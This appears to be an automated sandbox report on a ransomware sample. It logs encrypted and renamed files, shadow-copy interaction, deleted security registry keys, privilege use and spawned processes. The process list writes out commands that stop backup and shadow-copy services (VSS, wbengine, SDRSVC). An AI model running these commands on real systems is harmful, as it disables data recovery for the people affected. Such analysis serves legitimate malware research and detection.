File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\3899_20x20x32.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons_retina.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_QFvrhcF9rnA0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_lpix8Hdz0uM0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\11c.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-64.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\sqloledb.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_l9E0Jab9COg0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Trial-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_rOY6T56VlLw0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Light.scale-400.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\de-DE\rtscom.dll.mui C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\jumbo_11c.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ko-kr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_tGR5Kj9ys-40.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\de-DE\sqlxmlx.rll.mui.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_g_TtoKPC3vE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile_large.png.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_f3mmh6fc3Hs0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_8IYU2qy_QEI0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\WINGDNG2.TTF.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_h8pTF9MYoGY0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorSplashScreen.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hr-hr\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_eYJru2nTx480.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\_Resources\4.rsrc C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleSplashScreen.scale-200.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-ae\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_x2hW4msd8_o0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\3569_20x20x32.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_mtRDmiY2hfQ0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_YkDFdXDizLE0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_Grace-ul-oob.xrm-ms.KE9PCDT6mMcfEfsGoeW5Sd8pyIn4Br23qSXBolaLs87_RC9Suxq_6jw0.8zvpm C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Catalog\shape_hexagon.png C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 2776 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2776 wrote to memory of 3152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2776 wrote to memory of 3152 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 3688 wrote to memory of 1336 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3688 wrote to memory of 1336 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 1208 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 1208 wrote to memory of 932 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1208 wrote to memory of 932 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2004 wrote to memory of 3164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2004 wrote to memory of 3164 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 652 wrote to memory of 3972 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 652 wrote to memory of 3972 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 4012 wrote to memory of 3604 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4012 wrote to memory of 3604 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 4004 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4004 wrote to memory of 1480 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2832 wrote to memory of 212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2832 wrote to memory of 212 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 2224 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\net.exe
PID 3500 wrote to memory of 668 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3500 wrote to memory of 668 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2224 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 692 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 340 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2932 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\sc.exe
PID 2224 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 3248 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe
PID 2224 wrote to memory of 2920 N/A C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe

"C:\Users\Admin\AppData\Local\Temp\ccbd962faf485cb5fe6f4af4afd320fa0e34e84c0584a1d439571d2293ee8216.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_13373" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_13373" /y

